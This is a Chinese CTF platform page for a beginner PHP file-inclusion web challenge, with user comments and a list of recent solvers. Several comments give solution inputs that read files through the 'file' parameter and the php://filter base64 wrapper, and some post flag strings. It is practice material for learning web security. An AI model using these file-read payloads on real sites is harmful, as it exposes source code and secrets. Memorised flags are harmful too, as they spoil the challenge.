文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 11513
提  示:
描  述:
flag{}
评论
shingu 21天前

这题过于简单了。?file=/flag。

回复 0

HK1ng 3月前

使用伪协议来解题,启动靶机发现有超链接,点击后发现有file变量,然后页面有index.php,于是猜想是不是传一个index.php,果然不是。然后就给出这个提示,想办法去读一下这个,然后这里就是用了php://filter/read=convert.base64encode/resource=filepath,表示以base64编码的方式进行读取指定路径的文件。然后解码就可以看到。

回复 0

000ooo 4月前

/index.php?file=/flag

回复 1
哈哈哈嘿嘿嘿 1月前

为什么

回复 0

Zhumeng 4月前

php伪协议读取index.php

回复 1
Jiafeng 4月前

我在你的评论下面补充全吧:php://filter/convert.base64-encode/resource=index.php

回复 0

Wang_Micro 5月前

flag{642c1d8cf84d01e3a2df403e83d3e43b}

回复 0

33555 5月前

/index.php?file=///flag

回复 1

Pearpeach1 5月前

?file=php://filter/read=convert.base64-encode/resource=index.php

回复 0

hao7 6月前

flag{dff1aea3fcdd906ce70c1998addf1ccc}

回复 0

17795946336 6月前

flag{159cf1e0d16cf846e61ae8a3ba27e912}

回复 1

Z20g00d 7月前

flag{38cc5dc6199822623663592b58cec109}

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

SDSZEHTZ 攻破了该题 14小时前
1986557251 攻破了该题 21小时前
jiayouya 攻破了该题 22小时前
honglanYK 攻破了该题 1天前
pcxu 攻破了该题 1天前
蘑菇 攻破了该题 1天前
18897888104 攻破了该题 1天前
nusse 攻破了该题 1天前
hackno1 攻破了该题 2天前
yydy 攻破了该题 2天前
DBON 攻破了该题 2天前
Zzzzz11111 攻破了该题 2天前
daidai0204 攻破了该题 2天前
xymm 攻破了该题 2天前
ktrktr 攻破了该题 3天前
3344 攻破了该题 3天前
WoLike 攻破了该题 3天前
13457991023 攻破了该题 3天前
2684783401 攻破了该题 3天前
zyl231 攻破了该题 3天前
问题反馈